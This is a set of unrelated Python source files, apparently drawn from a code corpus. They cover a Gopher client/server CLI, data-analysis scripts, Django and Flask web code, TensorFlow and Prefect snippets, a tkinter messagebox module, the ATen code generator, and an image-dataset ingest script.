print(' -d, --directory=DIR\t\tDirectory to serve (default: pub/)')
print(' -A, --alt-handler=HANDLER\tAlternate handler to use if 404 error is generated (python file with it defined as "def alt(request):")')
print(' -s, --send-period\t\tSend a period at the end of each response (default: False)')
print(' -D, --debug\t\t\tPrint requests as they are received (default: False)')
print(' -v, --version\t\t\tPrint version')
print('Fetch Options:')
print(' -o, --output=FILE\t\tFile to write to (default: stdout)')
else:
# check if the user is serving or fetching
if sys.argv[1] == 'serve':
# check for arguments
# host
host = '127.0.0.1'
if '-H' in sys.argv or '--host' in sys.argv:
host = sys.argv[sys.argv.index('-H') + 1]
# port
port = 70
if '-p' in sys.argv or '--port' in sys.argv:
port = int(sys.argv[sys.argv.index('-p') + 1])
# advertised port
advertised_port = None
if '-a' in sys.argv or '--advertised-port' in sys.argv:
advertised_port = int(sys.argv[sys.argv.index('-a') + 1])
# directory
pub_dir = 'pub/'
if '-d' in sys.argv or '--directory' in sys.argv:
pub_dir = sys.argv[sys.argv.index('-d') + 1]
# alternate handler
alt_handler = False
if '-A' in sys.argv or '--alt-handler' in sys.argv:
alt_handler = sys.argv[sys.argv.index('-A') + 1]
# get the function from the file
alt_handler = getattr(
importlib.import_module(alt_handler), 'handler')
# send period
send_period = False
if '-s' in sys.argv or '--send-period' in sys.argv:
send_period = True
# debug
debug = False
if '-D' in sys.argv or '--debug' in sys.argv:
debug = True
# start the server
pituophis.serve(host=host, port=port, advertised_port=advertised_port,
handler=pituophis.handle, pub_dir=pub_dir, alt_handler=alt_handler,
send_period=send_period, debug=debug)
elif sys.argv[1] == 'fetch':
# check for arguments
# url
url = sys.argv[2]
# output file
output = 'stdout'
if '-o' in sys.argv or '--output' in sys.argv:
output = sys.argv[sys.argv.index('-o') + 1]
# start the fetch
o = pituophis.get(url)
if output == 'stdout':
sys.stdout.buffer.write(o.binary)
else:
with open(output, 'wb') as f:
f.write(o.binary)
f.close()
|
29642
|
import ConfigParser
from datetime import datetime
import os
import sys
import numpy as np
import pandas as pd
import utils.counts
import utils.counts_deviation
__author__ = '<NAME>'
# This script finds the days with the greatest deviation from some reference value (such as hourly means or medians)
if __name__ == '__main__':
if len(sys.argv) < 2:
        print 'ERROR: need to supply the path to the config file'
        sys.exit(1)
config_path = sys.argv[1]
conf = ConfigParser.ConfigParser()
conf.read(config_path)
# Paths
station_TS_dir = conf.get('Paths', 'station_TS_dir') # Path to station Time Series
ref_counts_file = conf.get('Paths', 'ref_counts_file')
out_file = conf.get('Paths', 'out_file') # Where to write the counts file
# Parameters
start_date = conf.get('Params', 'start_date')
end_date = conf.get('Params', 'end_date')
days = [int(d.strip()) for d in conf.get('Params', 'days').split(',')]
measure = conf.get('Params', 'measure')
# Get target dates
targ_dates = utils.counts.date_string_list(start_date, end_date, days)
# Create the counts file
ref = utils.counts.df_from_counts(ref_counts_file) # DF w/ mean flow for each link
measures = []
keepers = []
for i, stat in enumerate(ref.columns):
# Get path to stat ts file
        print 'Processing station: %s' % str(stat)
print 'Number %d of %d' % (i, ref.shape[1])
ts_path = os.path.join(station_TS_dir, str(stat), 'time_series.csv')
c_dev = utils.counts_deviation.CountsDeviation(ts_path, targ_dates)
if c_dev.missing: # if there is missing data, we skip the whole station
print "Missing data. Skipping station: %s" % str(stat)
continue
c_dev.calc_measure(measure, reference=ref[stat])
measures.append(c_dev.measures[measure])
keepers.append(stat)
df = pd.DataFrame(measures).transpose()
df.columns = keepers
df.index = targ_dates
    df = df.dropna(axis=1)
df['Max_Dev'] = df.apply(np.sum, axis=1)
df.to_csv(out_file)
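# Illustrative sketch only (not part of the original script): a hypothetical
# layout for the config file read above. Section and option names come from
# the conf.get(...) calls; every value shown is a placeholder.
#
# [Paths]
# station_TS_dir = /data/stations
# ref_counts_file = /data/ref_counts.csv
# out_file = /data/max_deviation.csv
#
# [Params]
# start_date = 2015-01-01
# end_date = 2015-12-31
# days = 0, 1, 2, 3, 4
# measure = rmse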
|
29643
|
from django.http import HttpResponse
class HttpResponseNoContent(HttpResponse):
status_code = 204
|
29648
|
import tensorflow as tf
i = tf.compat.v1.constant(0, name="Hole")
c = lambda i: tf.compat.v1.less(i, 10)
b = lambda i: tf.compat.v1.add(i, 1)
r = tf.compat.v1.while_loop(c, b, [i], name="While")
|
29707
|
import base64
import json
import os
import tempfile
import uuid
import zipfile
from io import BytesIO
import werkzeug
from flask import Blueprint, jsonify, request
from ..config import get_config
from ..dataset import convert_ndarray_to_image, import_csv_as_mdp_dataset
from ..models.dataset import Dataset, DatasetSchema
from .generator import generate_for_model
dataset_route = Blueprint("dataset", __name__)
generate_for_model(dataset_route, Dataset, DatasetSchema)
@dataset_route.route("/upload", methods=["POST"])
def upload_dataset():
# validation
if "dataset" not in request.files:
return jsonify({"status": "dataset is empty"}), 400
# save uploaded files and create MDPDataset
with tempfile.TemporaryDirectory() as dname:
# save file
file = request.files["dataset"]
file_name = werkzeug.utils.secure_filename(file.filename)
file_path = os.path.join(dname, file_name)
file.save(file_path)
# save image files
is_image = request.form.get("is_image") == "true"
if is_image:
# save zip file
zip_file = request.files["zip_file"]
zip_file_name = werkzeug.utils.secure_filename(zip_file.filename)
zip_file_path = os.path.join(dname, zip_file_name)
zip_file.save(zip_file_path)
# decompress zip file
with zipfile.ZipFile(zip_file_path) as zip_fd:
zip_fd.extractall(dname)
# convert uploaded data to MDPDataset
try:
mdp_dataset = import_csv_as_mdp_dataset(file_path, image=is_image)
except ValueError:
return jsonify({"status": "dataset conversion failed."}), 400
# save MDPDataset object.
dataset_name = str(uuid.uuid1()) + ".h5"
dataset_path = os.path.join(get_config("DATASET_DIR"), dataset_name)
mdp_dataset.dump(dataset_path)
# get dataset size
data_size = os.path.getsize(dataset_path)
episode_size = len(mdp_dataset)
step_size = sum(map(len, mdp_dataset))
# compute statistics
stats = mdp_dataset.compute_stats()
stats["observation_shape"] = mdp_dataset.get_observation_shape()
stats["action_size"] = mdp_dataset.get_action_size()
# handle ndarray serialization
stats_json = json.dumps(jsonify(stats).json)
# insert record
dataset = Dataset.create(
file_name,
dataset_name,
episode_size,
step_size,
data_size,
is_image,
mdp_dataset.is_action_discrete(),
stats_json,
)
# return json
return jsonify(DatasetSchema().dump(dataset))
@dataset_route.route("/<dataset_id>/example", methods=["GET"])
def get_example_vector_observation(dataset_id):
dataset = Dataset.get(dataset_id, raise_404=True)
# take care of computational cost
mdp_dataset = dataset.load_mdp_dataset()
if dataset.is_image:
# take first 3 samples
ndarrays = mdp_dataset.observations[:3]
observations = []
for ndarray in ndarrays:
image = convert_ndarray_to_image(ndarray)
# encode image to base64
buffer = BytesIO()
image.save(buffer, format="PNG")
encoded_image = base64.b64encode(buffer.getvalue())
# return in string
observations.append(encoded_image.decode().replace("'", ""))
else:
# take first 100 samples
n_steps = min(100, mdp_dataset.observations.shape[0])
        observations = mdp_dataset.observations[:n_steps].tolist()
return jsonify({"observations": observations})
|
29714
|
from prefect import task, Flow, Parameter
from prefect.tasks.prefect import StartFlowRun
from prefect.storage import GitHub
with Flow("token-test") as flow:
StartFlowRun(project_name="testing", flow_name="flow_must_fail")()
flow.storage = GitHub(repo="kvnkho/demos", path="/prefect/token_test.py")
flow.register("testing")
|
29725
|
import numpy as np
from scipy import stats
import pandas as pd
from sklearn.cross_decomposition import PLSRegression
def standardize_vector(v, center=True, scale=False):
if center:
v = v - np.mean(v)
if scale:
if np.std(v) == 0:
return v
else:
            return (v + 0.0) / np.std(v)
    return v
def standardize_vec(v, center='mean', scale='std'):
""""
Standardizes a vector by centering and scaling it
This function will ignore scaling if the scale value is zero and will
instead set the scale value to 1
"""
# choose the center value
if not center:
cent_val = 0.0
elif center == 'mean':
cent_val = np.mean(v)
elif center == 'median':
cent_val = np.median(v)
elif type(center) in [float, int]:
cent_val = center
else:
raise ValueError('improper center value')
# choose the scale value
if not scale:
        scale_val = 1.0
elif scale == 'max':
scale_val = max(v)
elif scale == 'std':
scale_val = np.std(v)
elif scale == 'mean':
scale_val = np.mean(v)
elif scale == 'median':
scale_val = np.median(v)
elif type(scale) in [float, int]:
scale_val = scale
else:
raise ValueError('improper scale value')
# don't scale if scale value is zero
if scale_val == 0:
scale_val = 1
return (v - cent_val + 0.0) / scale_val
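def _demo_standardize_vec():
    # Illustrative sketch only (not part of the original module): a few of the
    # center/scale combinations accepted by standardize_vec. The input vector
    # is arbitrary.
    v = np.array([1.0, 2.0, 3.0, 6.0])
    zero_mean = standardize_vec(v, center='mean', scale=None)    # centered, unscaled
    robust = standardize_vec(v, center='median', scale='std')    # median-centered, std-scaled
    halved = standardize_vec(v, center=0, scale=2.0)             # just divides by 2
    return zero_mean, robust, halved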
def get_PCA(X, scale=False):
"""
Returns the PCA decomposition of data frame X.
Rows of X are observations and columns are features.
Centers columns then performs PCA.
Optionally scales columns by standard deviation
X = U D V^t
Output
------
    U, D, V^t (as returned by numpy.linalg.svd)
"""
if type(X) == np.ndarray:
X = pd.DataFrame(X)
# center columns
X_stand = X.apply(lambda c: standardize_vector(c,
center=True, scale=scale))
# do SVD
return np.linalg.svd(X_stand, full_matrices=False)
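def _demo_get_PCA():
    # Illustrative sketch only (not part of the original module): verifies that
    # the factors returned by get_PCA reconstruct the column-centered data.
    # Note the third value is V^t, as returned by numpy.linalg.svd.
    rng = np.random.RandomState(0)
    X = pd.DataFrame(rng.randn(20, 4))
    U, D, Vt = get_PCA(X)
    X_centered = X - X.mean(axis=0)
    return np.allclose(U @ np.diag(D) @ Vt, X_centered)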
def get_pls(X, Y, n_comp):
"""
returns the PLS scores
parameters
----------
X: pandas data frame
Y: list
"""
# center and scale both X and y data
x = np.array(X.apply(lambda c: standardize_vector(c, center=True,
scale=True)))
y = standardize_vector(Y, center=True, scale=True)
    # compute PLS directions
pls = PLSRegression(n_components=int(n_comp), scale=True)
pls.fit(x, y)
return np.array(pls.x_scores_), pls.x_loadings_
|
29732
|
import os
import sys
import os.path as osp
from contextlib import contextmanager
############################################################
# Setup path
def add_path(path):
if path not in sys.path:
sys.path.insert(0, path)
curdir = osp.dirname(__file__)
lib_path = osp.join(curdir, '..', 'lib')
add_path(lib_path)
############################################################
# Import modules from the lib
from config import cfg
from utils.ops import may_create
from utils.proto import prototxt_from_template
@contextmanager
def workenv():
olddir = os.getcwd()
os.chdir(osp.join(curdir, '..'))
try:
yield
finally:
os.chdir(olddir)
def setup(phase_key, dataset, expname, rsltname):
'''Setup paths & general args after possible merge from config file.'''
# Save args to config
cfg.DATASET = dataset
cfg.EXP = expname
cfg.NUM_CLASSES = {
'TH14': 20,
'AN': 100,
}[cfg.DATASET]
# AN.train == TH14.val; AN.val == TH14.test
# if cfg.DATASET == 'AN':
# cfg[phase_key].STAGE = {
# 'val': 'train',
# 'test': 'val',
# 'train': 'train',
# 'val': 'val',
# }[cfg[phase_key].STAGE]
# Setup <infix> first, resulting in
# '' => ''; 'infix' => '.infix' so that we can uniformly insert it.
ret_infix = cfg.INFIX if not cfg.INFIX.startswith('.') else cfg.INFIX[1:]
ret_infix = '' if ret_infix == '' else '.{}'.format(ret_infix)
cfg.INFIX = ret_infix
# Setup <viz_folder> name
norm_str = 'normed' if cfg.FEAT.NORM else 'unnormed'
avt_str = {
True: '{avt}',
False: '{avt}{trh}'
}[cfg.FEAT.THRESH is None].format(avt=cfg.FEAT.ACTIVATION,
trh=cfg.FEAT.THRESH)
cfg.VIZ.FOLDER_NAME = '{}_{}_{}_{}'.format(cfg[phase_key].STAGE, cfg.FEAT.MODE,
norm_str, avt_str)
if not cfg.VIZ.FIX_WIDTH:
cfg.VIZ.FOLDER_NAME += '_fixwidth'
# Then several paths: <proto>, <log>, <local_snapshots>, <viz>
cfg.EXP_PATH = osp.join(cfg.EXP_DIR, cfg.DATASET, cfg.EXP)
cfg.PROTO_PATH = osp.join(cfg.EXP_PATH, 'proto')
cfg.LOG_PATH = osp.join(cfg.EXP_PATH, 'log')
cfg.LOCAL_SNAPSHOT_PATH = osp.join(cfg.EXP_PATH, 'snapshot')
# Example: exp/TH14/experiment100/val_mul_normed_relu10_fixwidth
cfg.VIZ_PATH = osp.join(cfg.EXP_PATH, cfg.VIZ.FOLDER_NAME)
cfg.RSLT_PATH = osp.join(cfg.EXP_PATH, 'rslt')
path2check = [cfg.PROTO_PATH, cfg.LOG_PATH, cfg.LOCAL_SNAPSHOT_PATH,
cfg.VIZ_PATH, cfg.RSLT_PATH]
map(may_create, path2check)
cfg.SL_PATH = osp.join(cfg.PROTO_PATH,
'solver{}.prototxt'.format(cfg.INFIX))
cfg.TR_PATH = osp.join(cfg.PROTO_PATH,
'train{}.prototxt'.format(cfg.INFIX))
# Currently we share the prototxt between training and testing.
cfg.TE_PATH = cfg.TR_PATH
cfg.SNAPSHOT_PATH = osp.join(cfg.LOCAL_SNAPSHOT_PATH, {
True: rsltname.replace('.pc', '.caffemodel'),
False: '{}_iter{}.caffemodel'.format(rsltname, cfg.MAX_ITER)
}[rsltname.endswith('.pc')])
# Setup `videoids_lst` template.
cfg.DSPEC.VID_LST = osp.join(cfg.DATA_DIR, cfg.DATASET, '{stage}_videoid.lst')
# Specify training input.
cfg[phase_key].DATA_PATH = osp.join(cfg.DATA_DIR, cfg.DATASET,
cfg[phase_key].DATA_FILE)
phase_ = phase_key.lower() + '.'
# Processing rsltname in following logic in order:
# (1) rsltname should start with '<phase>.';
# (2) rslname with '.pc' should be directly used;
# (3) otherwise it should be recorded with the iteration.
if not rsltname.startswith(phase_):
rsltname = phase_ + rsltname
# Finally the result pickle file.
cfg[phase_key].RSLT_PATH = osp.join(cfg.RSLT_PATH, {
True: rsltname,
False: '{}_iter{}.pc'.format(rsltname, cfg.MAX_ITER)
}[rsltname.endswith('.pc')])
# Generate prototxt from template
prototxt_from_template()
|
29750
|
from tkinter.commondialog import Dialog
ERROR = 'error'
INFO = 'info'
QUESTION = 'question'
WARNING = 'warning'
ABORTRETRYIGNORE = 'abortretryignore'
OK = 'ok'
OKCANCEL = 'okcancel'
RETRYCANCEL = 'retrycancel'
YESNO = 'yesno'
YESNOCANCEL = 'yesnocancel'
ABORT = 'abort'
RETRY = 'retry'
IGNORE = 'ignore'
OK = 'ok'
CANCEL = 'cancel'
YES = 'yes'
NO = 'no'
class Message(Dialog):
"""A message box"""
command = 'tk_messageBox'
def _show(title=None, message=None, _icon=None, _type=None, **options):
if _icon and 'icon' not in options:
options['icon'] = _icon
if _type and 'type' not in options:
options['type'] = _type
if title:
options['title'] = title
if message:
options['message'] = message
res = Message(**options).show()
if isinstance(res, bool):
if res:
return YES
return NO
return str(res)
def showinfo(title=None, message=None, **options):
"""Show an info message"""
return _show(title, message, INFO, OK, **options)
def showwarning(title=None, message=None, **options):
"""Show a warning message"""
return _show(title, message, WARNING, OK, **options)
def showerror(title=None, message=None, **options):
"""Show an error message"""
return _show(title, message, ERROR, OK, **options)
def askquestion(title=None, message=None, **options):
"""Ask a question"""
return _show(title, message, QUESTION, YESNO, **options)
def askokcancel(title=None, message=None, **options):
"""Ask if operation should proceed; return true if the answer is ok"""
s = _show(title, message, QUESTION, OKCANCEL, **options)
return s == OK
def askyesno(title=None, message=None, **options):
"""Ask a question; return true if the answer is yes"""
s = _show(title, message, QUESTION, YESNO, **options)
return s == YES
def askyesnocancel(title=None, message=None, **options):
"""Ask a question; return true if the answer is yes, None if cancelled."""
s = _show(title, message, QUESTION, YESNOCANCEL, **options)
s = str(s)
if s == CANCEL:
return None
return s == YES
def askretrycancel(title=None, message=None, **options):
"""Ask if operation should be retried; return true if the answer is yes"""
s = _show(title, message, WARNING, RETRYCANCEL, **options)
return s == RETRY
if __name__ == '__main__':
print('info', showinfo('Spam', 'Egg Information'))
print('warning', showwarning('Spam', 'Egg Warning'))
print('error', showerror('Spam', 'Egg Alert'))
print('question', askquestion('Spam', 'Question?'))
print('proceed', askokcancel('Spam', 'Proceed?'))
print('yes/no', askyesno('Spam', 'Got it?'))
print('yes/no/cancel', askyesnocancel('Spam', 'Want it?'))
print('try again', askretrycancel('Spam', 'Try again?'))
|
29760
|
from django.conf.urls.defaults import patterns, include, url
from django.contrib import admin
from board.feeds import EventFeed
from board.views import IndexView, ServiceView
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name='index'),
url(r'^services/(?P<slug>[-\w]+)$', ServiceView.as_view(), name='service'),
url(r'^feed$', EventFeed(), name='feed'),
url(r'^admin/', include(admin.site.urls)),
)
|
29767
|
from __future__ import (
annotations,
)
import logging
import warnings
from pathlib import (
Path,
)
from typing import (
TYPE_CHECKING,
Optional,
Type,
TypeVar,
Union,
)
from .object import (
Object,
)
if TYPE_CHECKING:
from .config import (
Config,
)
logger = logging.getLogger(__name__)
S = TypeVar("S", bound="SetupMixin")
class SetupMixin(Object):
"""Setup Mixin class."""
def __init__(self, *args, already_setup: bool = False, **kwargs):
super().__init__(**kwargs)
self._already_setup = already_setup
@property
def already_setup(self) -> bool:
"""Already Setup getter.
:return: A boolean value.
"""
return self._already_setup
@property
def already_destroyed(self) -> bool:
"""Already Destroy getter.
:return: A boolean value.
"""
return not self._already_setup
@classmethod
def from_config(cls: Type[S], config: Optional[Union[Config, Path]] = None, **kwargs) -> S:
"""Build a new instance from config.
:param config: Config instance. If `None` is provided, default config is chosen.
:param kwargs: Additional named arguments.
:return: A instance of the called class.
"""
if isinstance(config, Path):
from .config import (
Config,
)
config = Config(config)
if config is None:
from .config import (
Config,
)
from .injections import (
Inject,
)
config = Inject.resolve(Config)
logger.info(f"Building a {cls.__name__!r} instance from config...")
return cls._from_config(config=config, **kwargs)
@classmethod
def _from_config(cls: Type[S], config: Config, **kwargs) -> S:
return cls(**kwargs)
async def __aenter__(self: S) -> S:
await self.setup()
return self
async def setup(self) -> None:
"""Setup miscellaneous repository things.
:return: This method does not return anything.
"""
if not self._already_setup:
logger.debug(f"Setting up a {type(self).__name__!r} instance...")
await self._setup()
self._already_setup = True
async def _setup(self) -> None:
return
async def __aexit__(self, exc_type, exc_value, exc_traceback):
await self.destroy()
async def destroy(self) -> None:
"""Destroy miscellaneous repository things.
:return: This method does not return anything.
"""
if self._already_setup:
logger.debug(f"Destroying a {type(self).__name__!r} instance...")
await self._destroy()
self._already_setup = False
async def _destroy(self) -> None:
"""Destroy miscellaneous repository things."""
def __del__(self):
if not getattr(self, "already_destroyed", True):
warnings.warn(
f"A not destroyed {type(self).__name__!r} instance is trying to be deleted...", ResourceWarning
)
class MinosSetup(SetupMixin):
"""Minos Setup class."""
def __init__(self, *args, **kwargs):
warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead.", DeprecationWarning)
super().__init__(*args, **kwargs)
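class _DemoSetup(SetupMixin):
    """Illustrative sketch only (not part of the original module), assuming the
    Object base class requires no extra constructor arguments."""
    async def _setup(self) -> None:
        logger.debug("demo: acquiring resources...")
    async def _destroy(self) -> None:
        logger.debug("demo: releasing resources...")
async def _demo_setup_mixin() -> None:
    # Hypothetical usage: entering the async context manager runs setup() and
    # flips already_setup; leaving it runs destroy().
    async with _DemoSetup() as instance:
        assert instance.already_setup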
|
29769
|
from optparse import OptionParser
import yaml
import cwrap_parser
import nn_parse
import native_parse
import preprocess_declarations
import function_wrapper
import dispatch_macros
import copy_wrapper
from code_template import CodeTemplate
parser = OptionParser()
parser.add_option('-s', '--source-path', help='path to source director for tensorlib',
action='store', default='.')
parser.add_option('-o', '--output-dependencies',
help='only output a list of dependencies', action='store')
parser.add_option('-n', '--no-cuda', action='store_true')
options, files = parser.parse_args()
if options.output_dependencies is not None:
output_dependencies_file = open(options.output_dependencies, 'w')
TEMPLATE_PATH = options.source_path + "/templates"
GENERATOR_DERIVED = CodeTemplate.from_file(
TEMPLATE_PATH + "/GeneratorDerived.h")
STORAGE_DERIVED_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/StorageDerived.cpp")
STORAGE_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/StorageDerived.h")
TYPE_DERIVED_CPP = CodeTemplate.from_file(TEMPLATE_PATH + "/TypeDerived.cpp")
TYPE_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TypeDerived.h")
TYPE_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Type.h")
TYPE_CPP = CodeTemplate.from_file(TEMPLATE_PATH + "/Type.cpp")
TENSOR_DERIVED_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorDerived.cpp")
TENSOR_SPARSE_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorSparse.cpp")
TENSOR_DENSE_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorDense.cpp")
TENSOR_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TensorDerived.h")
TENSOR_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Tensor.h")
TENSOR_METHODS_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TensorMethods.h")
FUNCTIONS_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Functions.h")
NATIVE_FUNCTIONS_PATH = options.source_path + "/NativeFunctions.h"
generators = {
'CPUGenerator.h': {
'name': 'CPU',
'th_generator': 'THGenerator * generator;',
'header': 'TH/TH.h',
},
'CUDAGenerator.h': {
'name': 'CUDA',
'th_generator': '',
'header': 'THC/THC.h'
},
}
backends = ['CPU']
if not options.no_cuda:
backends.append('CUDA')
densities = ['Dense', 'Sparse']
scalar_types = [
('Byte', 'uint8_t', 'Long', 'uint8_t'),
('Char', 'int8_t', 'Long', 'int8_t'),
('Double', 'double', 'Double', 'double'),
('Float', 'float', 'Double', 'float'),
('Int', 'int', 'Long', 'int32_t'),
('Long', 'int64_t', 'Long', 'int64_t'),
('Short', 'int16_t', 'Long', 'int16_t'),
('Half', 'Half', 'Double', 'THHalf'),
]
# shared environment for non-derived base classes Type.h Tensor.h Storage.h
top_env = {
'type_registrations': [],
'type_headers': [],
'type_method_declarations': [],
'type_method_definitions': [],
'type_method_inline_definitions': [],
'tensor_method_declarations': [],
'tensor_method_definitions': [],
'function_declarations': [],
'function_definitions': [],
'type_ids': [],
}
def write(filename, s):
filename = "ATen/" + filename
if options.output_dependencies is not None:
output_dependencies_file.write(filename + ";")
return
with open(filename, "w") as f:
f.write(s)
def format_yaml(data):
if options.output_dependencies:
# yaml formatting is slow so don't do it if we will ditch it.
return ""
noalias_dumper = yaml.dumper.SafeDumper
noalias_dumper.ignore_aliases = lambda self, data: True
return yaml.dump(data, default_flow_style=False, Dumper=noalias_dumper)
def generate_storage_type_and_tensor(backend, density, scalar_type, declarations):
scalar_name, c_type, accreal, th_scalar_type = scalar_type
env = {}
density_tag = 'Sparse' if density == 'Sparse' else ''
th_density_tag = 'S' if density == 'Sparse' else ''
env['Density'] = density
env['ScalarName'] = scalar_name
env['ScalarType'] = c_type
env['THScalarType'] = th_scalar_type
env['AccScalarName'] = accreal
env['Storage'] = "{}{}Storage".format(backend, scalar_name)
env['Type'] = "{}{}{}Type".format(density_tag, backend, scalar_name)
env['Tensor'] = "{}{}{}Tensor".format(density_tag, backend, scalar_name)
env['SparseTensor'] = "Sparse{}{}Tensor".format(backend, scalar_name)
env['Backend'] = density_tag + backend
# used for generating switch logic for external functions
tag = density_tag + backend + scalar_name
env['TypeID'] = 'TypeID::' + tag
top_env['type_ids'].append(tag + ',')
if backend == 'CUDA':
env['th_headers'] = ['#include <THC/THC.h>',
'#include <THCUNN/THCUNN.h>',
'#undef THNN_',
'#undef THCIndexTensor_']
# if density == 'Sparse':
env['th_headers'] += ['#include <THCS/THCS.h>',
'#undef THCIndexTensor_']
sname = '' if scalar_name == "Float" else scalar_name
env['THType'] = 'Cuda{}'.format(sname)
env['THStorage'] = 'THCuda{}Storage'.format(sname)
if density == 'Dense':
env['THTensor'] = 'THCuda{}Tensor'.format(sname)
else:
env['THTensor'] = 'THCS{}Tensor'.format(scalar_name)
env['THIndexTensor'] = 'THCudaLongTensor'
env['state'] = ['context->thc_state']
env['isCUDA'] = 'true'
env['storage_device'] = 'return storage->device;'
env['Generator'] = 'CUDAGenerator'
else:
env['th_headers'] = ['#include <TH/TH.h>',
'#include <THNN/THNN.h>',
'#undef THNN_']
# if density == 'Sparse':
env['th_headers'].append('#include <THS/THS.h>')
env['THType'] = scalar_name
env['THStorage'] = "TH{}Storage".format(scalar_name)
env['THTensor'] = 'TH{}{}Tensor'.format(th_density_tag, scalar_name)
env['THIndexTensor'] = 'THLongTensor'
env['state'] = []
env['isCUDA'] = 'false'
env['storage_device'] = 'throw std::runtime_error("CPU storage has no device");'
env['Generator'] = 'CPUGenerator'
env['AS_REAL'] = env['ScalarType']
if scalar_name == "Half":
env['SparseTensor'] = 'Tensor'
if backend == "CUDA":
env['to_th_type'] = 'HalfFix<__half,Half>'
env['to_at_type'] = 'HalfFix<Half,__half>'
env['AS_REAL'] = 'convert<half,double>'
env['THScalarType'] = 'half'
else:
env['to_th_type'] = 'HalfFix<THHalf,Half>'
env['to_at_type'] = 'HalfFix<Half,THHalf>'
elif scalar_name == 'Long':
env['to_th_type'] = 'long'
env['to_at_type'] = 'int64_t'
else:
env['to_th_type'] = ''
env['to_at_type'] = ''
declarations, definitions = function_wrapper.create_derived(
env, declarations)
env['type_derived_method_declarations'] = declarations
env['type_derived_method_definitions'] = definitions
if density != 'Sparse':
# there are no special storage types for Sparse, they are composed
# of Dense tensors
write(env['Storage'] + ".cpp", STORAGE_DERIVED_CPP.substitute(env))
write(env['Storage'] + ".h", STORAGE_DERIVED_H.substitute(env))
env['TensorDenseOrSparse'] = TENSOR_DENSE_CPP.substitute(env)
env['THTensor_nDimension'] = 'tensor->nDimension'
else:
env['TensorDenseOrSparse'] = TENSOR_SPARSE_CPP.substitute(env)
env['THTensor_nDimension'] = 'tensor->nDimensionI + tensor->nDimensionV'
write(env['Type'] + ".cpp", TYPE_DERIVED_CPP.substitute(env))
write(env['Type'] + ".h", TYPE_DERIVED_H.substitute(env))
write(env['Tensor'] + ".cpp", TENSOR_DERIVED_CPP.substitute(env))
write(env['Tensor'] + ".h", TENSOR_DERIVED_H.substitute(env))
type_register = (('context->type_registry[static_cast<int>(Backend::{})]' +
'[static_cast<int>(ScalarType::{})].reset(new {}(context));')
.format(env['Backend'], scalar_name, env['Type']))
top_env['type_registrations'].append(type_register)
top_env['type_headers'].append(
'#include "ATen/{}.h"'.format(env['Type']))
return env
cwrap_files = [f for f in files if f.endswith('.cwrap')]
nn_files = [f for f in files if f.endswith('.yaml') or f.endswith('.h')]
declarations = [d
for file in cwrap_files
for d in cwrap_parser.parse(file)]
print(nn_files)
declarations += nn_parse.run(nn_files)
declarations += native_parse.parse(NATIVE_FUNCTIONS_PATH)
declarations = preprocess_declarations.run(declarations)
for fname, env in generators.items():
write(fname, GENERATOR_DERIVED.substitute(env))
# note: this will fill in top_env['type/tensor_method_declarations/definitions']
# and modify the declarations to include any information that will be used by
# function_wrapper.create_derived for all backends
output_declarations = function_wrapper.create_generic(top_env, declarations)
write("Declarations.yaml", format_yaml(output_declarations))
# populated by generate_storage_type_and_tensor
all_types = []
for backend in backends:
for density in densities:
for scalar_type in scalar_types:
if density == 'Sparse' and scalar_type[0] == 'Half':
# THS does not do half type yet.
continue
all_types.append(generate_storage_type_and_tensor(
backend, density, scalar_type, declarations))
write('Type.h', TYPE_H.substitute(top_env))
write('Type.cpp', TYPE_CPP.substitute(top_env))
write('Tensor.h', TENSOR_H.substitute(top_env))
write('TensorMethods.h', TENSOR_METHODS_H.substitute(top_env))
write('Functions.h', FUNCTIONS_H.substitute(top_env))
write('Dispatch.h', dispatch_macros.create(all_types))
write('Copy.cpp', copy_wrapper.create(all_types))
if options.output_dependencies is not None:
output_dependencies_file.close()
|
29815
|
from configargparse import ArgParser
from PIL import Image
import logging
import numpy as np
import os
def transform_and_save(img_arr, output_filename):
"""
Takes an image and optionally transforms it and then writes it out to output_filename
"""
img = Image.fromarray(img_arr)
img.save(output_filename)
class Ingest(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
for setn in ('train', 'val'):
self.manifests[setn] = os.path.join(self.out_dir, '{}-index.csv'.format(setn))
self.target_size = target_size
self.trainpairlist = {}
self.valpairlist = {}
self.labels = range(10)
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
os.mkdir(os.path.join(self.outimgdir, 'train'))
os.mkdir(os.path.join(self.outimgdir, 'val'))
self.outlabeldir = os.path.join(self.out_dir, 'labels')
if not os.path.exists(self.outlabeldir):
os.mkdir(self.outlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'train_X.bin')
train_y_path = os.path.join(self.input_dir, 'train_y.bin')
test_x_path = os.path.join(self.input_dir, 'test_X.bin')
test_y_path = os.path.join(self.input_dir, 'test_y.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
train_yf = open(train_y_path, 'rb')
train_y = np.fromfile(train_yf, dtype=np.uint8)
test_xf = open(test_x_path, 'rb')
test_x = np.fromfile(test_xf, dtype=np.uint8)
test_x = np.reshape(test_x, (-1, 3, 96, 96))
test_x = np.transpose(test_x, (0, 3, 2, 1))
test_yf = open(test_y_path, 'rb')
test_y = np.fromfile(test_yf, dtype=np.uint8)
idx = np.zeros(10, dtype=np.int)
for i in xrange(train_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'train', str(train_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
